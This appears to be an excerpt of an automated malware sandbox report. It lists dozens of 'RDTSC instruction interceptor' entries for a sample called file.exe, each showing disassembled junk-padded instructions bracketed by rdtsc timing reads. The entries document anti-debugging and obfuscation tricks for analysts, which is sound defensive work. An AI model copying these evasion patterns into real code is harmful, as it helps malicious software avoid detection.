                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8007A second address: 4C80096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a call 00007FF624C752FDh 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C802C0 second address: 4C802D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0673 second address: 4CA0679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0679 second address: 4CA06FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF624B4E7E4h 0x00000013 adc ecx, 7D0E5B08h 0x00000019 jmp 00007FF624B4E7DBh 0x0000001e popfd 0x0000001f mov bh, al 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 mov si, 7D77h 0x00000028 jmp 00007FF624B4E7DCh 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f jmp 00007FF624B4E7E0h 0x00000034 mov ebp, esp 0x00000036 jmp 00007FF624B4E7E0h 0x0000003b xchg eax, ecx 0x0000003c pushad 0x0000003d mov si, D99Dh 0x00000041 mov cx, 7299h 0x00000045 popad 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA06FE second address: 4CA070E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA070E second address: 4CA07CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF624B4E7E4h 0x00000011 sub ecx, 3D890488h 0x00000017 jmp 00007FF624B4E7DBh 0x0000001c popfd 0x0000001d mov edx, eax 0x0000001f popad 0x00000020 mov eax, dword ptr [76FB65FCh] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FF624B4E7E0h 0x0000002c or ch, FFFFFFE8h 0x0000002f jmp 00007FF624B4E7DBh 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007FF624B4E7E8h 0x0000003b sbb cl, 00000048h 0x0000003e jmp 00007FF624B4E7DBh 0x00000043 popfd 0x00000044 popad 0x00000045 test eax, eax 0x00000047 jmp 00007FF624B4E7E6h 0x0000004c je 00007FF696DE198Ch 0x00000052 pushad 0x00000053 push ecx 0x00000054 mov di, D7C0h 0x00000058 pop edi 0x00000059 push ecx 0x0000005a push ebx 0x0000005b pop eax 0x0000005c pop edi 0x0000005d popad 0x0000005e mov ecx, eax 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 popad 0x00000066 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA087E second address: 4CA08A8 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 mov edx, 0729C2C4h 0x0000000d pop edi 0x0000000e popad 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007FF628F95B8Dh 0x00000017 mov edi, edi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c call 00007FF624C75304h 0x00000021 pop ecx 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA08A8 second address: 4CA08E7 instructions: 0x00000000 rdtsc 0x00000002 mov bx, A6B6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FF624B4E7E7h 0x0000000d mov dx, cx 0x00000010 pop eax 0x00000011 popad 0x00000012 push edx 0x00000013 jmp 00007FF624B4E7E0h 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c mov di, cx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA08E7 second address: 4CA08F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA08F5 second address: 4CA08FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA08FB second address: 4CA0901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50099 second address: 4C500A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C500A8 second address: 4C5010A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1C67AC0Ah 0x00000008 pushfd 0x00000009 jmp 00007FF624C752FBh 0x0000000e or eax, 5FC492AEh 0x00000014 jmp 00007FF624C75309h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d and esp, FFFFFFF8h 0x00000020 jmp 00007FF624C752FEh 0x00000025 xchg eax, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF624C75307h 0x0000002d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5010A second address: 4C5010F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5010F second address: 4C50166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 9E88h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF624C752FEh 0x00000011 xchg eax, ecx 0x00000012 jmp 00007FF624C75300h 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 mov di, cx 0x0000001c mov dh, al 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FF624C75304h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF624C752FAh 0x0000002f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50166 second address: 4C5016A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5016A second address: 4C50170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50170 second address: 4C50221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov dx, D9BCh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [ebp+10h] 0x00000010 jmp 00007FF624B4E7DBh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 pushad 0x00000018 call 00007FF624B4E7E2h 0x0000001d pop esi 0x0000001e mov ch, bh 0x00000020 popad 0x00000021 push eax 0x00000022 mov al, dh 0x00000024 pop esi 0x00000025 popad 0x00000026 push eax 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FF624B4E7E0h 0x0000002e sbb ax, 6A68h 0x00000033 jmp 00007FF624B4E7DBh 0x00000038 popfd 0x00000039 call 00007FF624B4E7E8h 0x0000003e pushfd 0x0000003f jmp 00007FF624B4E7E2h 0x00000044 adc esi, 760667F8h 0x0000004a jmp 00007FF624B4E7DBh 0x0000004f popfd 0x00000050 pop ecx 0x00000051 popad 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FF624B4E7E2h 0x0000005a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50221 second address: 4C50233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FEh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50233 second address: 4C5025E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624B4E7E5h 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5037A second address: 4C5037E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5037E second address: 4C50384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50384 second address: 4C5038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5038A second address: 4C5038E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5038E second address: 4C503CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or edx, dword ptr [ebp+0Ch] 0x0000000e jmp 00007FF624C75300h 0x00000013 test edx, 61000000h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C503CB second address: 4C503CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C503CF second address: 4C503D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40787 second address: 4C4078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4078D second address: 4C40791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40791 second address: 4C407BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624B4E7E5h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407BE second address: 4C407C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407C4 second address: 4C407C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407C8 second address: 4C407CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C407CC second address: 4C40830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF624B4E7E6h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ch, CDh 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007FF624B4E7E5h 0x0000001a and esp, FFFFFFF8h 0x0000001d jmp 00007FF624B4E7DEh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 push ecx 0x00000025 pushad 0x00000026 popad 0x00000027 pop edx 0x00000028 movzx esi, dx 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ebx, ecx 0x00000030 mov dl, al 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov bl, cl 0x00000039 popad 0x0000003a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40830 second address: 4C40854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40854 second address: 4C40858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40858 second address: 4C4085E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4085E second address: 4C4089A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ah 0x00000005 pushfd 0x00000006 jmp 00007FF624B4E7DDh 0x0000000b adc cx, F436h 0x00000010 jmp 00007FF624B4E7E1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF624B4E7DCh 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4089A second address: 4C408C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF624C75305h 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C408C1 second address: 4C40995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d call 00007FF624B4E7DCh 0x00000012 mov ecx, 6C189271h 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d mov ebx, 00000000h 0x00000022 jmp 00007FF624B4E7E4h 0x00000027 test esi, esi 0x00000029 pushad 0x0000002a movzx ecx, dx 0x0000002d call 00007FF624B4E7E3h 0x00000032 pushfd 0x00000033 jmp 00007FF624B4E7E8h 0x00000038 or cx, FC08h 0x0000003d jmp 00007FF624B4E7DBh 0x00000042 popfd 0x00000043 pop esi 0x00000044 popad 0x00000045 je 00007FF696E34215h 0x0000004b pushad 0x0000004c mov di, 7738h 0x00000050 mov cx, bx 0x00000053 popad 0x00000054 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e pushfd 0x0000005f jmp 00007FF624B4E7DBh 0x00000064 add ecx, 0AFAECFEh 0x0000006a jmp 00007FF624B4E7E9h 0x0000006f popfd 0x00000070 popad 0x00000071 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40995 second address: 4C40A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF624C752FCh 0x00000012 adc eax, 21847328h 0x00000018 jmp 00007FF624C752FBh 0x0000001d popfd 0x0000001e push ecx 0x0000001f mov ax, di 0x00000022 pop ebx 0x00000023 popad 0x00000024 je 00007FF696F5ACC7h 0x0000002a jmp 00007FF624C752FEh 0x0000002f test byte ptr [76FB6968h], 00000002h 0x00000036 pushad 0x00000037 mov ax, 485Dh 0x0000003b mov bx, ax 0x0000003e popad 0x0000003f jne 00007FF696F5ACB6h 0x00000045 jmp 00007FF624C75304h 0x0000004a mov edx, dword ptr [ebp+0Ch] 0x0000004d jmp 00007FF624C75300h 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 mov bh, ah 0x00000056 pushad 0x00000057 pushfd 0x00000058 jmp 00007FF624C75309h 0x0000005d or esi, 1EA724B6h 0x00000063 jmp 00007FF624C75301h 0x00000068 popfd 0x00000069 mov cx, 0AA7h 0x0000006d popad 0x0000006e popad 0x0000006f push eax 0x00000070 pushad 0x00000071 movsx ebx, si 0x00000074 mov edx, ecx 0x00000076 popad 0x00000077 xchg eax, ebx 0x00000078 jmp 00007FF624C752FEh 0x0000007d xchg eax, ebx 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007FF624C75307h 0x00000085 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40A91 second address: 4C40ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF624B4E7DFh 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF624B4E7E1h 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40ABD second address: 4C40B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FF624C752FEh 0x0000000f push dword ptr [ebp+14h] 0x00000012 jmp 00007FF624C75300h 0x00000017 push dword ptr [ebp+10h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF624C752FAh 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40B05 second address: 4C40B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40B26 second address: 4C40B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushfd 0x00000008 jmp 00007FF624C75306h 0x0000000d add esi, 62094E18h 0x00000013 jmp 00007FF624C752FBh 0x00000018 popfd 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40B56 second address: 4C40B9E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF624B4E7E8h 0x00000008 and ecx, 1545B878h 0x0000000e jmp 00007FF624B4E7DBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF624B4E7E5h 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40B9E second address: 4C40C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 98A2h 0x00000007 pushfd 0x00000008 jmp 00007FF624C75303h 0x0000000d sbb ah, FFFFFF9Eh 0x00000010 jmp 00007FF624C75309h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebx 0x0000001a jmp 00007FF624C752FEh 0x0000001f mov esp, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FF624C752FDh 0x0000002a sbb ax, 3E86h 0x0000002f jmp 00007FF624C75301h 0x00000034 popfd 0x00000035 mov ecx, 210AEC37h 0x0000003a popad 0x0000003b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50DB3 second address: 4C50DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50DB8 second address: 4C50DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50DBE second address: 4C50DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50DC2 second address: 4C50E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov si, 9923h 0x00000011 pushad 0x00000012 mov bx, si 0x00000015 pushfd 0x00000016 jmp 00007FF624C75302h 0x0000001b adc al, 00000068h 0x0000001e jmp 00007FF624C752FBh 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50E16 second address: 4C50E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50E1C second address: 4C50E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75308h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50E38 second address: 4C50E61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624B4E7E5h 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50E61 second address: 4C50E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FCh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50BE0 second address: 4C50BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50BE6 second address: 4C50C0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 mov bx, 5CC2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624C75304h 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC05E0 second address: 4CC05E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC05E6 second address: 4CC068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, ebx 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FF624C75304h 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FF624C752FEh 0x0000001e jmp 00007FF624C75305h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007FF624C75300h 0x0000002a jmp 00007FF624C75305h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007FF624C752FEh 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FF624C75307h 0x00000040 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC068C second address: 4CC0692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0692 second address: 4CC0696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0696 second address: 4CC069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC03C4 second address: 4CC044C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF624C752FFh 0x00000009 or esi, 5D9865EEh 0x0000000f jmp 00007FF624C75309h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FF624C75300h 0x0000001b or si, C568h 0x00000020 jmp 00007FF624C752FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a jmp 00007FF624C75306h 0x0000002f mov ebp, esp 0x00000031 jmp 00007FF624C75300h 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC044C second address: 4CC0469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C601EC second address: 4C601F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C601F2 second address: 4C601F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C601F8 second address: 4C601FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C601FC second address: 4C60236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624B4E7E7h 0x00000015 rdtsc
